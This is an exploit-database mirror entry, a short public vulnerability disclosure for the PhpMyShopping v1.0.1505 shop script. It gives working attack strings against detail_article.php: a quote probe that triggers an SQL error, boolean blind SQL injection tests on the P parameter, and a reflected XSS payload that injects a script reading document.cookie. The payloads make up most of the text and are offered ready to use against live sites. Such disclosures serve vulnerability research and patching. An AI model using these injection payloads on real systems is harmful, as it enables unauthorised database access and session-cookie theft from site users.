exploit-db-mirror/platforms/php/webapps/15173.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

35 lines
No EOL
946 B
Text
Executable file

####################################################################
.:. Author : Metropolis
.:. Home : www.metropolis.fr.cr
.:. Script : PhpMyShopping
.:. Version : v1.0.1505
.:. Download Script: http://www.phpmyshopping.org/night_build/PhpMyShopping_mono_boutique_v1.0.1505.tar.gz
.:. Bug Type : Multiple Vulnerabilities / Blind SQL Injections / XSS
####################################################################
===[ Blind Sql Injection ]===
SQL Error =>
/detail_article.php?C=3&P=7'
www.site.com/detail_article.php?C=3&P=7 [Blind]
[Demo] :
www.site.com/detail_article.php?C=3&P=1 and 1=1 <-- true
www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false
===[ XSS ]===
www.site.com/detail_article.php?C=3&P=7 [XSS]
[Demo] :
www.site.com/detail_article.php?C=3&P=7"><script>alert(document.cookie);</script>
####################################################################